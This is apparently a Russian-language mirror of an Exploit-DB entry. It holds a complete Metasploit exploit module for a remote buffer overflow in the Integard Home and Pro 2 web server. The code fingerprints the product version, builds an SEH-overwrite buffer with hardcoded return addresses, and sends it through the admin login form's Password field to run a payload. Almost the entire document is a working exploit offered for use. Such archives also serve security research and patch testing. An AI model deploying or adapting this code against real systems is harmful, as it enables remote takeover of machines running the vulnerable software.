- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 14941
- Проверка EDB
-
- Пройдено
- Автор
- LINCOLN, NULLTHREAT, RICK2600
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS_X86
- CVE
- null
- Дата публикации
- 2010-09-07
Integard Home and Pro 2 - Remote HTTP Buffer Overflow
Код:
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Integard Home/Pro version 2.0',
'Description' => %q{
Exploit for Integard HTTP Server, vulnerability discovered by Lincoln
},
'Author' =>
[
'Lincoln',
'Nullthreat',
'rick2600',
'corelanc0d3r'
],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
['URL','http://www.corelan.be:8800/advisories.php?id=CORELAN-10-061'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 2000,
'BadChars' => "\x00\x20\x26\x2f\x3d\x3f\x5c",
'StackAdjustment' => -1500,
},
'Platform' => 'win',
'Privileged' => false,
'Targets' =>
[
[ 'Automatic Targeting', { 'auto' => true }],
[ 'Integard Home 2.0.0.9021', { 'Ret' => 0x0041565E,}],
[ 'Integard Pro 2.2.0.9026', { 'Ret' => 0x0040362C,}],
],
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(18881)
], self.class )
end
def exploit
mytarget = target
continueattack=true
if(target['auto'])
mytarget = nil
print_status("[*] Automatically detecting the target...")
connect
response = send_request_raw(
{'uri' => '/banner.jpg',
'version' => '1.1',
'method' => 'GET'
}, 5)
contlength = response['Content-Length']
if (contlength == "24584")
print_status("[!] Found Version - Integard Home")
mytarget = self.targets[1]
elsif (contlength == "23196")
print_status("[!] Found Version - Integard Pro")
mytarget = self.targets[2]
else
print_status("[-] Unknown Version")
continueattack=false
end
disconnect
end
if continueattack
print_status("[!] Selected Target: #{mytarget.name}")
print_status("[*] Building Buffer")
pay = payload.encoded
junk = rand_text_alpha_upper(3091 - pay.length)
jmp = "\xE9\x2B\xF8\xFF\xFF"
nseh = "\xEB\xF9\x90\x90"
seh = [mytarget.ret].pack('V')
buffer = junk + pay + jmp + nseh + seh
print_status("[*] Sending Request")
post_data = "Password=" + buffer + "&Redirect=%23%23%23REDIRECT%23%23%23&NoJs=0&LoginButtonName=Login"
req = "/LoginAdmin"
connect
send_request_raw({
'uri' => req,
'version' => '1.1',
'method' => 'POST',
'headers' =>
{
'Host' => '192.168.1.1:18881',
'Content-Length' => 1074
},
'data' => post_data
}, 5)
print_status("[*] Request Sent")
handler
end
end
end
- Источник
- www.exploit-db.com